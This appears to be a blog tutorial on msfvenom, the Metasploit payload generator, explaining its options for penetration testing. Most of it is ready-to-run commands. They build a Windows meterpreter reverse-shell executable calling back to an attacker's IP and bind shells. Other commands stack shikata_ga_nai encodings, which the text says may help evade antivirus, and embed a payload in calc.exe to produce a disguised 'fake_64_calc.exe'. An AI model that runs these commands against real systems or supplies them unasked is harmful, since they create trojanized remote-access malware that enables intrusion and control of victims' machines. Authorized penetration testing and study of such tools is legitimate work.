Home / Open Source Penetration Testing Tools / How to use Msfvenom in Penetration Testing : MSFVENOM Tutorial

How to use Msfvenom in Penetration Testing : MSFVENOM Tutorial

How to use Msfvenom in Penetration Testing

Remember msfpayload and msfencode used for Metasploit payload generation and encoding of the payload ?

Well Offensive security has removed msfpayload and msfencode from Metasploit Framework . What do you use to create the payloads then ?

The Answer is MSFVENOM !!

Msfvenom is the combination of payload generation and encoding. It will replace msfpayload and msfencode on June 8th 2015.

How to use Msfvenom in Penetration Testing
How to use Msfvenom in Penetration Testing

To start using msfvenom, first please take a look at the options it supports:

msfvenom --help

-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads -
l, --list [module_type] List a module type. 
Options are: payloads, encoders, nops, all -n, 
--nopsled <length> Prepend a nopsled of [length] size on to the payload 
-f, --format <format> Output format (use --help-formats for a list) 
-e, --encoder [encoder] The encoder to use 
-a, --arch <architecture> The architecture to use --platform <platform> The platform of the payload 
-s, --space <length> The maximum size of the resulting payload 
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff' -i, --iterations <count> The number of times to encode the payload 
-c, --add-code <path> Specify an additional win32 shellcode file to include 
-x, --template <path> Specify a custom executable file to use as a template 
-k, --keep Preserve the template behavior and inject the payload as a new thread 
--payload-options List the payload's standard options 
-o, --out <path> Save the payload 
-v, --var-name <name> Specify a custom variable name to use for certain output formats 
-h, --help Show this message --help-formats List available formats


How to use Msfvenom to generate a payload

To see what payloads are available from Framework, you can do:

./msfvenom -l payloads

Typically, this is probably how you will use msfvenom:

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe

How to use Msfvenom encode a payload

By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

To find out what encoders you can use, you can use the -l flag:

./msfvenom -l encoders

You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoiding antivirus, but know that encoding isn’t really meant to be used a real AV evasion solution:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 

How to avoid bad characters

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw

How to supply a custom template using msfvenom

By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe 

Please note: If you’d like to create a x64 payload with a custom x64 custom template for Winodws, then instead of the exe format, you should use exe-only:

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.

How to chain msfvenom output

The old msfpayload and msfencode utilities were often chained together in order layer on multiple encodings. This is possible using msfvenom as well:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
./msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe


MSFVENOM is a promising addition to Metasploit framework . 

About Vanshit Malhotra

Ethical Hacker | Cyber Forensics Investigator | Information Security Consultant Vanshit Malhotra is an Expert at security tactics orchestrating operations to fit strategy. With a 4 + years of experience in various domains of Information Security , I have been able to solve very complex security problems across many technologies and then teach and enable the clients to do the same. #Please Like , Share and Comment if our Posts are helpful to you .

Have any Suggestions? Compliments? Why not comment then?